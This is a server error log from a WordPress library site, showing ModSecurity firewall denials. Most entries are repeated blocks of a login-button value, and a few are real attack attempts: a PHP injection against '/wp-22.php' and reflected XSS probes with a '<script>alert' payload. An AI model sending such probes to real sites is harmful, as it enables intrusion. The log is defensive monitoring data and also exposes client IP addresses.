[Tue Aug 29 00:28:30.989195 2023] [:error] [pid 56573] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzZPsCo-f0AANz9EI4AAAAA"]
[Tue Aug 29 00:31:02.919528 2023] [:error] [pid 56598] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzZ1sCo-f0AAN0WYXYAAAAO"]
[Tue Aug 29 00:33:33.929155 2023] [:error] [pid 56377] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzabcCo-f0AANw5XbkAAAAH"]
[Tue Aug 29 00:36:01.405336 2023] [:error] [pid 56647] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzbAcCo-f0AAN1H@i8AAAAF"]
[Tue Aug 29 00:38:30.270405 2023] [:error] [pid 56639] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzblsCo-f0AAN0-AZwAAAAO"]
[Tue Aug 29 00:40:59.113883 2023] [:error] [pid 56701] [client 20.168.87.198] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZOzcK8Co-f0AAN19d8oAAAAC"]
[Tue Aug 29 04:51:34.115260 2023] [:error] [pid 59510] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0W5sCo-f0AAOh2CdEAAAAA"]
[Tue Aug 29 04:52:07.383067 2023] [:error] [pid 59506] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0XB8Co-f0AAOhy8KAAAAAN"]
[Tue Aug 29 04:52:42.125835 2023] [:error] [pid 59455] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0XKsCo-f0AAOg-pVYAAAAO"]
[Tue Aug 29 04:53:18.359419 2023] [:error] [pid 59139] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0XTsCo-f0AAOcDL6cAAAAH"]
[Tue Aug 29 04:53:59.436018 2023] [:error] [pid 59510] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0Xd8Co-f0AAOh2CdgAAAAA"]
[Tue Aug 29 04:54:42.164777 2023] [:error] [pid 59546] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0XosCo-f0AAOia9f0AAAAF"]
[Tue Aug 29 04:55:24.288727 2023] [:error] [pid 59208] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0XzMCo-f0AAOdIqWsAAAAD"]
[Tue Aug 29 04:56:08.278172 2023] [:error] [pid 59139] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0X@MCo-f0AAOcDL64AAAAH"]
[Tue Aug 29 04:56:55.433757 2023] [:error] [pid 59546] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0YJ8Co-f0AAOia9f8AAAAF"]
[Tue Aug 29 04:57:45.166532 2023] [:error] [pid 59173] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0YWcCo-f0AAOclwgEAAAAE"]
[Tue Aug 29 04:58:32.936100 2023] [:error] [pid 59511] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0YiMCo-f0AAOh36J4AAAAC"]
[Tue Aug 29 04:59:23.473939 2023] [:error] [pid 59510] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0Yu8Co-f0AAOh2CdsAAAAA"]
[Tue Aug 29 05:00:16.932575 2023] [:error] [pid 59457] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0Y8MCo-f0AAOhBGCYAAAAS"]
[Tue Aug 29 05:01:12.531667 2023] [:error] [pid 59173] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0ZKMCo-f0AAOclwgcAAAAE"]
[Tue Aug 29 05:02:07.398976 2023] [:error] [pid 59546] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0ZX8Co-f0AAOia9ggAAAAF"]
[Tue Aug 29 05:03:03.286444 2023] [:error] [pid 59546] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0Zl8Co-f0AAOia9gkAAAAF"]
[Tue Aug 29 05:04:00.885219 2023] [:error] [pid 59510] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0Z0MCo-f0AAOh2CeUAAAAA"]
[Tue Aug 29 05:05:01.415470 2023] [:error] [pid 58938] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0aDcCo-f0AAOY6kh8AAAAL"]
[Tue Aug 29 05:06:02.087593 2023] [:error] [pid 59457] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0aSsCo-f0AAOhBGDIAAAAS"]
[Tue Aug 29 05:07:02.508719 2023] [:error] [pid 59546] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0ahsCo-f0AAOia9hAAAAAF"]
[Tue Aug 29 05:08:02.260865 2023] [:error] [pid 59173] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0awsCo-f0AAOclwhMAAAAE"]
[Tue Aug 29 05:09:04.662037 2023] [:error] [pid 59624] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0bAMCo-f0AAOjoXRQAAAAI"]
[Tue Aug 29 05:10:10.710349 2023] [:error] [pid 59623] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0bQsCo-f0AAOjn3VYAAAAG"]
[Tue Aug 29 05:11:19.022394 2023] [:error] [pid 59731] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0bh8Co-f0AAOlT9NoAAAAB"]
[Tue Aug 29 05:12:29.101545 2023] [:error] [pid 59506] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0bzcCo-f0AAOhy8NEAAAAN"]
[Tue Aug 29 05:13:39.729673 2023] [:error] [pid 59455] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0cE8Co-f0AAOg-pYcAAAAO"]
[Tue Aug 29 05:14:48.036271 2023] [:error] [pid 59506] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0cWMCo-f0AAOhy8NMAAAAN"]
[Tue Aug 29 05:15:58.719940 2023] [:error] [pid 59623] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0cnsCo-f0AAOjn3V0AAAAG"]
[Tue Aug 29 05:17:09.998157 2023] [:error] [pid 59623] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0c5cCo-f0AAOjn3V8AAAAG"]
[Tue Aug 29 05:18:20.082156 2023] [:error] [pid 59814] [client 34.32.13.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wp-submit. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe7\\x99\\xbb\\xe5\\xbd\\x95 found within ARGS:wp-submit: \\xe7\\x99\\xbb\\xe5\\xbd\\x95"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO0dLMCo-f0AAOmmf0AAAAAN"]
[Tue Aug 29 10:36:01.699999 2023] [:error] [pid 64939] [client 93.125.75.19] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "perpustakaan.unla.ac.id"] [uri "/wp-22.php"] [unique_id "ZO1nocCo-f0AAP2rLgMAAAAF"]
[Tue Aug 29 11:19:47.484501 2023] [:error] [pid 673] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:a. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:a: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO1x48Co-f0AAAKhNhEAAAAJ"]
[Tue Aug 29 11:19:47.682911 2023] [:error] [pid 668] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:s. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22);</ found within ARGS:s: <script>alert(\\x22XSS\\x22);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "perpustakaan.unla.ac.id"] [uri "/"] [unique_id "ZO1x48Co-f0AAAKcIx4AAAAA"]
